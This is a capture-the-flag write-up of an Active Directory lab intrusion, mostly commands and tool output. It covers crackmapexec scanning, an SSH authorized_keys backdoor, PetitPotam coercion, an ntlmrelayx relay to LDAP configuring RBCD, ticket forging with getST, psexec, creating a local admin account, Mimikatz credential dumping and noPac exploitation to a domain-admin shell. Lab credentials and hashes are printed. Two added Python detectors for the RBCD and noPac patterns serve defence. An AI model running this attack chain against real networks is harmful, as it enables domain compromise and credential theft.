Although crackmapexec is installed locally, it was unbearably slow, so I downloaded the cme executable CME and scanned for WebClient and PetitPotam with it

crackmapexec smb target -u username -H <NTLM_HASH> -d domain
proxychains crackmapexec smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -d xiaorang.lab -M Webdav
proxychains crackmapexec smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -d xiaorang.lab -M PetitPotam

PetitPotam is indeed present. According to the hint in the challenge, the intended path is coerced authentication via NTLM relay over WebDAV + PetitPotam. I went back over 红队域渗透NTLM Relay:强制认证方式总结 (a summary of coerced-authentication methods for NTLM relay in red-team domain penetration); the gist is that PetitPotam can force the target server or target user to authenticate to our server with its LM hash / NTLM hash, and that authentication can then be relayed to other target servers for lateral movement, privilege escalation and so on. Here only 172.22.11.26 has PetitPotam. The advantage of relaying NTLM via WebDAV is that it is not affected by protocol signing, and WebClient automatically uses the current user's credentials for NTLM authentication against Local Intranet or Trusted Sites targets.

This follows the 春秋云镜-【仿真场景】Spoofing writeup, which uses the no-ADCS + PetitPotam + NTLM relay approach. The idea is to use PetitPotam to trigger a vulnerable target that has the WebClient service enabled, so that the target accesses our HTTP relay service; the target reaches our relay through WebClient carrying NTLM authentication, which is relayed to LDAP to obtain the machine account's identity; then, as the machine account, modify its own msDS-AllowedToActOnBehalfOfOtherIdentity attribute, configuring RBCD on XR-LCM3AE8B.xiaorang.lab.

There is one condition, though: we need to forward the server port's traffic to port 80 on the local client, and SSH reverse port forwarding only listens on 127.0.0.1. So we forward 0.0.0.0:80 to 127.0.0.1:79 and then reverse-forward that back to the client's local port 80, effectively making port 80 listen on 0.0.0.0.

First scan for WebDAV; the WebDAV service is present on 172.22.11.26

PetitPotam is present

proxychains ./cme smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -d xiaorang.lab -M Webdav
proxychains ./cme smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -d xiaorang.lab -M PetitPotam

proxychains ./cme smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -M webdav

SMB 172.22.11.45 445 XR-DESKTOP [*] Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (name:XR-DESKTOP) (domain:xiaorang.lab) (signing:False) (SMBv1:True)
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.11.45:445 ... OK
... OK
SMB 172.22.11.6 445 XIAORANG-DC [*] Windows 10.0 Build 17763 x64 (name:XIAORANG-DC) (domain:xiaorang.lab) (signing:True) (SMBv1:False)
SMB 172.22.11.26 445 XR-LCM3AE8B [*] Windows 10.0 Build 18362 x64 (name:XR-LCM3AE8B) (domain:xiaorang.lab) (signing:False) (SMBv1:False)
SMB 172.22.11.45 445 XR-DESKTOP [+] xiaorang.lab\yangmei:xrihGHgoNZQ
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.11.6:445 [proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.11.102:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.11.6:445 ... OK
SMB 172.22.11.6 445 XIAORANG-DC [+] xiaorang.lab\yangmei:xrihGHgoNZQ
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.11.26:445 [proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.11.103:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.11.26:445 ... OK
SMB 172.22.11.26 445 XR-LCM3AE8B [+] xiaorang.lab\yangmei:xrihGHgoNZQ
WEBDAV 172.22.11.26 445 XR-LCM3AE8B WebClient Service enabled on: 172.22.11.26



proxychains ./cme smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -M petitpotam

SMB 172.22.11.45 445 XR-DESKTOP [*] Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (name:XR-DESKTOP) (domain:xiaorang.lab) (signing:False) (SMBv1:True)
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.11.45:445 ... OK
... OK
... OK
SMB 172.22.11.26 445 XR-LCM3AE8B [*] Windows 10.0 Build 18362 x64 (name:XR-LCM3AE8B) (domain:xiaorang.lab) (signing:False) (SMBv1:False)
SMB 172.22.11.6 445 XIAORANG-DC [*] Windows 10.0 Build 17763 x64 (name:XIAORANG-DC) (domain:xiaorang.lab) (signing:True) (SMBv1:False)
SMB 172.22.11.45 445 XR-DESKTOP [+] xiaorang.lab\yangmei:xrihGHgoNZQ
[proxychains] Strict chain ... 127.0.0.1:55556 [proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.11.26:445 ... 172.22.11.45:445 ... OK
... OK
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.11.26:445 ... OK
PETITPOT... 172.22.11.45 445 XR-DESKTOP VULNERABLE
PETITPOT... 172.22.11.45 445 XR-DESKTOP Next step: https://github.com/topotam/PetitPotam
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.11.102:445 SMB 172.22.11.26 445 XR-LCM3AE8B [+] xiaorang.lab\yangmei:xrihGHgoNZQ
[proxychains] Strict chain ... 127.0.0.1:55556 [proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.11.6:445 ... 172.22.11.26:445 ... OK
... OK
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.11.6:445 ... OK
PETITPOT... 172.22.11.26 445 XR-LCM3AE8B VULNERABLE
PETITPOT... 172.22.11.26 445 XR-LCM3AE8B Next step: https://github.com/topotam/PetitPotam
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.11.103:445 SMB 172.22.11.6 445 XIAORANG-DC [+] xiaorang.lab\yangmei:xrihGHgoNZQ
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.11.6:445 ... OK
PETITPOT... 172.22.11.6 445 XIAORANG-DC VULNERABLE
PETITPOT... 172.22.11.6 445 XIAORANG-DC Next step: https://github.com/topotam/PetitPotam

  1. No-ADCS + PetitPotam + NTLM relay approach
    Attack chain: use PetitPotam to trigger a vulnerable target that has the WebClient service enabled, so that the target accesses our HTTP relay service; the target reaches our relay through WebClient carrying NTLM authentication, which is relayed to LDAP to obtain the machine account's identity; as the machine account, modify its own msDS-AllowedToActOnBehalfOfOtherIdentity attribute, allowing our malicious machine account to impersonate users and authenticate to the target machine (RBCD)
  • Condition: the target machine must have the WebClient service enabled
    The WebClient scan shows that only 172.22.11.26 (XR-LCM3AE8B) can be taken this way

Per the challenge description, WebDAV + PetitPotam coerced authentication is what is needed here. Simply put, we use PetitPotam to force the target host to authenticate to our server with its LM hash / NTLM hash, and then relay that authentication to other target servers to move laterally.

From the blogs of more experienced players, the approach used here is no-ADCS + PetitPotam + NTLM relay; the idea is roughly as follows

1. Use PetitPotam to make the target access the HTTP service
2. The target accesses the relay via WebClient with NTLM authentication, which is relayed to LDAP
3. Obtain the machine account's identity
4. As the machine account, modify its own msDS-AllowedToActOnBehalfOfOtherIdentity attribute, which then allows us to access the target machine.

Relay environment setup

We need to forward port 80 on the server to port 80 on the local client.

So first set up an SSH key and write it in as a backdoor.

  • Relay attack preamble:
    • In a real engagement the relay only needs the service occupying port 80 stopped and port forwarding turned on (portfwd; later CS versions added rportfwd_local, which forwards straight to the client's local machine)
    • This demonstration follows an approach close to a real engagement, rather than dropping impacket onto the entry ubuntu host
  1. Relay environment setup: port forwarding + proxy
    We currently need to forward the server's port 80 to the client's local port 80
  • Note: SSH reverse port forwarding only listens on 127.0.0.1, so a small trick is needed
    As the figure shows, even when the reverse forward of port 79 is told to listen on all interfaces (-R *:79:127.0.0.1:80), port 79 still ends up bound to 127.0.0.1 (the figure also has the socks5 proxy enabled)
  • Add one more socat so that traffic on 0.0.0.0:80 is forwarded to 127.0.0.1:79 and then reverse-forwarded back to the client's local port 80, effectively making port 80 listen on 0.0.0.0

I habitually write the key pair into the current directory

# attack machine
ssh-keygen -t rsa -b 4096 -f ./rsa_key
cat ./rsa_key.pub

# target
echo "ssh-rsa <public key from rsa_key.pub> matrix@matrix" > /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys

Connect over SSH:

First use ssh to forward traffic arriving at port 79 on the remote host (39.99.132.128), through the ssh tunnel, to your local port 80. Then have the remote host (39.99.132.128) listen on port 80 (0.0.0.0:80) and forward the traffic it receives to its own port 79.

In effect, access to port 80 on the remote host is forwarded to port 79 and then back to port 80 on the attack machine; external access to the remote host's port 80 = access to your local port 80.

ssh -i ./rsa_key root@39.99.132.128 -D 127.0.0.1:55556 -R \*:79:127.0.0.1:80
nohup socat TCP-LISTEN:80,fork,bind=0.0.0.0 TCP:localhost:79 &

By default, WebClient only uses the current user's credentials automatically for NTLM authentication against targets in the Local Intranet or Trusted Sites list

On the .76 host, use socat to forward the port to the VPS, then forward from the VPS to port 80 on Kali (roughly this flow)


Traffic is now forwarded successfully: a curl to 172.22.11.76 is forwarded to our local Kali

nc -lvvp 80
proxychains curl http://172.22.11.76:80


Note:

  • As mentioned earlier, there is no LDAPS, so addcomputer cannot be used
  • Also, when running through proxychains, only the DC's IP may follow ldap://
  • Use the previously compromised XR-Desktop as the malicious machine account for the RBCD setup

Next, start ntlmrelayx locally, using the previously captured XR-Desktop as the malicious machine account for the RBCD setup, and then use PetitPotam to make XR-LCM3AE8B authenticate to 172.22.11.76


proxychains4 impacket-ntlmrelayx -t ldap://172.22.11.6 --no-dump --no-da --no-acl --escalate-user 'xr-desktop$' --delegate-access
proxychains ntlmrelayx.py -t ldap://172.22.11.6 --no-dump --no-da --no-acl --escalate-user 'xr-desktop$' --delegate-access

proxychains4 impacket-ntlmrelayx -t ldap://172.22.11.6 --no-dump --no-da --no-acl --escalate-user 'xr-desktop$' --delegate-access
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled

[*] Servers started, waiting for connections
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Client requested path: /webdav/pipe/srvsvc
[*] HTTPD(80): Client requested path: /webdav/pipe/srvsvc
[*] HTTPD(80): Connection from 127.0.0.1 controlled, attacking target ldap://172.22.11.6
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.11.6:389 ... OK
[*] HTTPD(80): Client requested path: /webdav/pipe/srvsvc
[*] HTTPD(80): Authenticating against ldap://172.22.11.6 as XIAORANG/XR-LCM3AE8B$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Client requested path: /webdav/pipe/srvsvc
[*] HTTPD(80): Client requested path: /webdav/pipe/srvsvc
[*] All targets processed!
[*] HTTPD(80): Connection from 127.0.0.1 controlled, but there are no more targets left!
[*] Delegation rights modified succesfully!
[*] xr-desktop$ can now impersonate users on XR-LCM3AE8B$ via S4U2Proxy
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Client requested path: /

Next, use PetitPotam against XR-LCM3AE8B (172.22.11.26) to coerce it into authenticating.

The PetitPotam vulnerability forces the .26 machine to connect to the .76 machine.

What the relay actually does here is modify the machine account's msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
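That attribute write is also what a defender can watch for. The following added example (not part of the original write-up) scans Windows Security event 5136 ("A directory service object was modified") records for changes to msDS-AllowedToActOnBehalfOfOtherIdentity and raises the severity when a computer account writes that attribute on its own object, which is the shape the relay above produces (XR-LCM3AE8B$ authenticates to LDAP and XR-LCM3AE8B$'s own object is modified). The event records are constructed; key names follow the 5136 event XML fields, and the operation type uses the rendered "Value Added" text rather than the raw resource string. Logging this attribute requires the "Audit Directory Service Changes" subcategory and a SACL on the computer objects.

```python
# Added example (not from the original write-up): detect writes to the
# msDS-AllowedToActOnBehalfOfOtherIdentity attribute in Windows Security
# event 5136. The records below are constructed; key names follow the event
# XML fields, reduced to what the check needs.
RBCD_ATTRIBUTE = "msDS-AllowedToActOnBehalfOfOtherIdentity"

SAMPLE_EVENTS = [
    # relay signature: the coerced computer account writes its own object
    {"EventID": 5136, "SubjectUserName": "XR-LCM3AE8B$", "SubjectDomainName": "XIAORANG",
     "ObjectDN": "CN=XR-LCM3AE8B,CN=Computers,DC=xiaorang,DC=lab",
     "ObjectClass": "computer", "AttributeLDAPDisplayName": RBCD_ATTRIBUTE,
     "OperationType": "Value Added"},
    # unrelated attribute change on another computer object (no alert)
    {"EventID": 5136, "SubjectUserName": "svc_deploy", "SubjectDomainName": "XIAORANG",
     "ObjectDN": "CN=WS-FINANCE-07,CN=Computers,DC=xiaorang,DC=lab",
     "ObjectClass": "computer", "AttributeLDAPDisplayName": "servicePrincipalName",
     "OperationType": "Value Added"},
    # an administrator configuring RBCD on a server: still worth a change-ticket check
    {"EventID": 5136, "SubjectUserName": "Administrator", "SubjectDomainName": "XIAORANG",
     "ObjectDN": "CN=WEB01,OU=Servers,DC=xiaorang,DC=lab",
     "ObjectClass": "computer", "AttributeLDAPDisplayName": RBCD_ATTRIBUTE,
     "OperationType": "Value Added"},
    # a different event type, ignored by the check
    {"EventID": 4624, "SubjectUserName": "zhanghui", "SubjectDomainName": "XIAORANG"},
]


def sam_account_from_dn(dn, object_class):
    """Derive the sAMAccountName from the first RDN of a DN.

    Computer objects carry a trailing "$" in their sAMAccountName, users do not.
    """
    first_rdn = dn.split(",", 1)[0]
    name = first_rdn.split("=", 1)[1]
    return name + "$" if object_class.lower() == "computer" else name


def rbcd_alerts(events):
    """Return one alert per 5136 event that touches the RBCD attribute."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 5136:
            continue
        if ev.get("AttributeLDAPDisplayName", "").lower() != RBCD_ATTRIBUTE.lower():
            continue
        target = sam_account_from_dn(ev["ObjectDN"], ev.get("ObjectClass", ""))
        subject = ev["SubjectUserName"]
        # A machine account editing its own delegation attribute is the relay pattern:
        # the coerced host's credential is what ntlmrelayx forwards to LDAP.
        self_write = subject.upper() == target.upper()
        alerts.append({
            "severity": "high" if self_write else "medium",
            "subject": ev.get("SubjectDomainName", "") + "\\" + subject,
            "object": target,
            "operation": ev.get("OperationType", ""),
            "reason": ("computer account wrote its own RBCD attribute; "
                       "typical of an NTLM relay to LDAP") if self_write else
                      "RBCD attribute changed; verify it matches an approved change",
        })
    return alerts


if __name__ == "__main__":
    for alert in rbcd_alerts(SAMPLE_EVENTS):
        print(alert)
```

The self-write heuristic is deliberately narrow: legitimate RBCD configuration is done by an administrator on some other object, so a computer account appearing as both subject and target of a 5136 on this attribute is worth an immediate look, while other writes go to a change-review queue.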

As shown, the RBCD attack is complete; the next step is simply to request a silver ticket for XR-LCM3AE8B.

proxychains python3 PetitPotam.py -u yangmei -p xrihGHgoNZQ -d xiaorang.lab ubuntu@80/webdav 172.22.11.26
proxychains python3 PetitPotam.py -u yangmei -p xrihGHgoNZQ -d xiaorang.lab ubuntu@80/webdav 172.22.11.26
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
/home/matrix/Desktop/PetitPotam/PetitPotam.py:23: SyntaxWarning: invalid escape sequence '\ '
| _ \ ___ | |_ (_) | |_ | _ \ ___ | |_ __ _ _ __
___ _ _ _ ___ _
| _ \ ___ | |_ (_) | |_ | _ \ ___ | |_ __ _ _ __
| _/ / -_) | _| | | | _| | _/ / _ \ | _| / _` | | ' \
_|_|_ \___| _\__| _|_|_ _\__| _|_|_ \___/ _\__| \__,_| |_|_|_|
_| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'

PoC to elicit machine account authentication via some MS-EFSRPC functions
by topotam (@topotam77)

Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN



Trying pipe lsarpc
[-] Connecting to ncacn_np:172.22.11.26[\PIPE\lsarpc]
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.11.26:445 ... OK
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

At this point the coerced authentication has been received successfully.

Next, use the machine account XR-DESKTOP$ captured earlier to exploit RBCD against 172.22.11.26:

proxychains4 impacket-getST -spn cifs/XR-LCM3AE8B.xiaorang.lab -impersonate administrator -hashes :738dcc0171b84e1a36400008983a3e10  xiaorang.lab/XR-Desktop\$ -dc-ip 172.22.11.6

Next, set up the ticket cache:

export KRB5CCNAME=administrator.ccache

Add 172.22.11.26 XIAORANG\XR-LCM3AE8B to /etc/hosts (optional; it works either way), then connect with psexec without a password.

sudo vim /etc/hosts
# add the following line
172.22.11.26 XR-LCM3AE8B.xiaorang.lab

Then log in:

proxychains impacket-psexec xiaorang.lab/administrator@XR-LCM3AE8B.xiaorang.lab -k -no-pass -target-ip 172.22.11.26 -codec gbk


C:\windows\system32> type C:\users\administrator\flag\flag03.txt
___ _ __ __ _ __ _
/ __| | '_ \ ___ ___ / _| (_) _ _ / _` |
\__ \ | .__/ / _ \ / _ \ | _| | | | ' \ \__, |
|___/ |_|__ \___/ \___/ _|_|_ _|_|_ |_||_| |___/
_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'

flag03: flag{86d51603-a217-4a08-869d-1ff6d9486157}

flag4

noPac

Add a user:

net user matrix$ Matrix2025! /add
net localgroup administrators matrix$ /add

Connect via RDP:

proxychains xfreerdp3 /u:matrix$ /p:'Matrix2025!' /v:172.22.11.26 /cert:ignore

After logging in over RDP, upload Mimikatz and dump credentials.

This yields a domain user, zhanghui:

PS C:\Users\matrix$\Desktop> ./mimikatz.exe

.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords
...
Authentication Id : 0 ; 744772 (00000000:000b5d44)
Session : RemoteInteractive from 2
User Name : zhanghui
Domain : XIAORANG
Logon Server : XIAORANG-DC
Logon Time : 2024/1/22 11:27:21
SID : S-1-5-21-3598443049-773813974-2432140268-1133
msv :
[00000003] Primary
* Username : zhanghui
* Domain : XIAORANG
* NTLM : 1232126b24cdf8c9bd2f788a9d7c7ed1

The challenge description mentions noPac; a search turned up this article: https://xz.aliyun.com/t/10694

Tool: https://github.com/Ridter/noPac

The vulnerability principle is roughly as follows:

1. Create a machine account with the same name as the DC's machine account (without the trailing $; combined with CVE-2021-42278, AD does not validate machine account names in the domain at this point).
2. After the account requests a TGT, rename the account, then request a TGS ticket via S4U2Self.
3. In the TGS_REP phase the DC cannot find this account, so it encrypts the TGS ticket with its own key and supplies a PAC belonging to that account, which yields a high-privilege ST.
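The three steps above leave traces on the DC. This added example (not from the original write-up or the noPac tool) correlates Security events 4741 ("A computer account was created") and 4781 ("The name of an account was changed") to flag a machine account that is created without, or renamed to drop, its trailing $, and escalates when the resulting name matches a domain controller. The records and the DC list are constructed; field names follow the event XML. Alongside detection, the standard mitigations are the November 2021 Windows updates that fixed noPac and setting ms-DS-MachineAccountQuota to 0 so ordinary users cannot create machine accounts, which is the precondition for step 1.

```python
# Added example (not from the original write-up): correlate Windows Security
# events 4741 and 4781 to catch the noPac pattern described above: a new
# machine account whose sAMAccountName loses its trailing "$" and collides with
# a domain controller's name. The records and the DC list are constructed;
# key names follow the event XML fields.
DC_NAMES = {"XIAORANG-DC"}  # constructed: DC hostnames without the trailing "$"

SAMPLE_EVENTS = [
    # a low-privileged user creates a throwaway machine account ...
    {"EventID": 4741, "TimeCreated": "2024-01-22T11:30:02",
     "SubjectUserName": "zhanghui", "SamAccountName": "DESKTOP-QK2L9A$"},
    # ... and three seconds later renames it to the DC's name without "$"
    {"EventID": 4781, "TimeCreated": "2024-01-22T11:30:05",
     "SubjectUserName": "zhanghui", "OldTargetUserName": "DESKTOP-QK2L9A$",
     "NewTargetUserName": "XIAORANG-DC"},
    # routine admin rename that keeps the machine-account form (no alert)
    {"EventID": 4741, "TimeCreated": "2024-01-22T09:01:11",
     "SubjectUserName": "it-admin", "SamAccountName": "WS-FINANCE-07$"},
    {"EventID": 4781, "TimeCreated": "2024-01-22T09:05:40",
     "SubjectUserName": "it-admin", "OldTargetUserName": "WS-FINANCE-07$",
     "NewTargetUserName": "WS-FINANCE-08$"},
    # creation that already lacks the "$" (the CVE-2021-42278 side)
    {"EventID": 4741, "TimeCreated": "2024-01-22T12:15:00",
     "SubjectUserName": "guest-kiosk", "SamAccountName": "XIAORANG-DC"},
]


def is_machine_name(sam):
    """Machine accounts carry a trailing "$" in sAMAccountName."""
    return sam.endswith("$")


def nopac_alerts(events, dc_names=DC_NAMES):
    """Return alerts for machine-account names that drop "$" or collide with a DC.

    Events are processed in time order so that a 4781 rename can be tied back
    to the 4741 creation of the same account by the same principal.
    """
    dcs = {n.upper() for n in dc_names}
    created_by = {}  # sAMAccountName -> creator, from 4741 events
    alerts = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        if ev["EventID"] == 4741:
            sam = ev["SamAccountName"]
            created_by[sam] = ev["SubjectUserName"]
            if not is_machine_name(sam):
                alerts.append({
                    "severity": "high" if sam.upper() in dcs else "medium",
                    "account": sam, "by": ev["SubjectUserName"],
                    "time": ev["TimeCreated"],
                    "reason": "computer account created without trailing $",
                })
        elif ev["EventID"] == 4781:
            old, new = ev["OldTargetUserName"], ev["NewTargetUserName"]
            if is_machine_name(old) and not is_machine_name(new):
                reason = "machine account renamed to a non-$ name"
                if new.upper() in dcs:
                    reason += "; new name matches a domain controller"
                if created_by.get(old) == ev["SubjectUserName"]:
                    reason += "; renamed by the same principal that created it"
                alerts.append({
                    "severity": "high" if new.upper() in dcs else "medium",
                    "account": new, "by": ev["SubjectUserName"],
                    "time": ev["TimeCreated"], "reason": reason,
                })
    return alerts


if __name__ == "__main__":
    for alert in nopac_alerts(SAMPLE_EVENTS):
        print(alert)
```

Both alerts in the constructed data come out as high because the resulting name is a DC's; a rename to some other non-$ name is still reported at medium, since there is no routine reason for a computer object to lose that suffix.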

With the principle roughly understood, let's put it into practice.

Try the attack with the account just captured:

proxychains python3 noPac.py xiaorang.lab/zhanghui -hashes ':1232126b24cdf8c9bd2f788a9d7c7ed1' -dc-ip 172.22.11.6 --impersonate Administrator -create-child -use-ldap -shell

C:\windows\system32>type C:\users\administrator\flag\flag04.txt
8""""8
8 eeeee eeeee eeeee eeee e eeeee eeeee
8eeeee 8 8 8 88 8 88 8 8 8 8 8 8
88 8eee8 8 8 8 8 8eee 8e 8e 8 8e
e 88 88 8 8 8 8 88 88 88 8 88 "8
8eee88 88 8eee8 8eee8 88 88 88 8 88ee8

You successfully got the last flag.

flag04: flag{39ac82df-e49e-4ca1-80b9-35981880625d}

Privileges obtained successfully.

The machine account XR-DESKTOP$ captured at the very beginning could also be used here, since it is a machine account and already meets the requirement.

References:

https://xz.aliyun.com/news/12778

https://zer0peach.github.io/2024/12/04/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-Spoofing-writeup/#flag02

https://blog.csdn.net/uuzeray/article/details/142993560

https://fushuling.com/index.php/2023/10/14/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7spoofing/

https://www.cnblogs.com/backlion/p/17187375.html

https://cloud.tencent.com/developer/article/2219075

https://whoamianony.top/posts/privilege-escalation-ntlmrelay2self-over-http-webdav/

https://forum.butian.net/share/1944


春秋云镜 Spoofing
http://example.com/2026/test56/
Author: sangnigege
Published: 15 April 2026